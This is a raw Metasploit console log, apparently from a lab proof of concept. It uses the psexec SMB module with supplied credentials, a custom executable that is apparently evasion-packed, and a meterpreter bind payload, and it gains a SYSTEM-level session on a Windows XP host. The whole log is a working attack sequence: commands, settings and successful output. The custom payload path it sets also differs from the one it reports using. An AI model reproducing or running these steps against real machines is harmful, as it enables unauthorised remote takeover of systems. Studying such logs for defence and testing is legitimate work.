msf exploit(psexec) > use exploit/windows/smb/psexec

msf exploit(psexec) > set EXE::custom /root/tools/ave/pwn.exe

EXE::custom => /root/tools/ave/pwn.exe

msf exploit(psexec) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf exploit(psexec) > set rhost 192.168.116.183

rhost => 192.168.116.183

msf exploit(psexec) > set smbuser dax

smbuser => dax

msf exploit(psexec) > set smbpass test123

smbpass => test123

msf exploit(psexec) > set lport 8443

lport => 8443

msf exploit(psexec) > run

 

[*] 192.168.116.183:445 - Connecting to the server...

[*] Started bind handler

[*] 192.168.116.183:445 - Authenticating to 192.168.116.183:445 as user 'dax'...

[*] Sending stage (957487 bytes) to 192.168.116.183

[*] 192.168.116.183:445 - Selecting native target

[*] 192.168.116.183:445 - Uploading payload...

[*] 192.168.116.183:445 - Using custom payload /root/tools/avepoc/a.exe, RHOST and RPORT settings will be ignored!

[*] 192.168.116.183:445 - Created \mzrCIOVg.exe...

[+] 192.168.116.183:445 - Service started successfully...

[*] 192.168.116.183:445 - Deleting \mzrCIOVg.exe...

[-] 192.168.116.183:445 - Delete of \mzrCIOVg.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)

[*] Exploit completed, but no session was created.

msf exploit(psexec) > [*] Meterpreter session 4 opened (192.168.116.142:33453 -> 192.168.116.183:8443) at 2017-05-27 18:47:23 +0200

 

msf exploit(psexec) > sessions

 

Active sessions

===============

 

Id Type Information Connection

-- ---- ----------- ----------

4 meterpreter x86/windows NT-AUTORIT_T\SYSTEM @ DAX-RYMZ48Z3EYO 192.168.116.142:33453 -> 192.168.116.183:8443 (192.168.116.183)

 

msf exploit(psexec) > sessions -i 4

[*] Starting interaction with 4...

 

meterpreter > sysinfo

Computer : DAX-RYMZ48Z3EYO

OS : Windows XP (Build 2600, Service Pack 3).

Architecture : x86

System Language : de_DE

Domain : ARBEITSGRUPPE

Logged On Users : 2

Meterpreter : x86/windows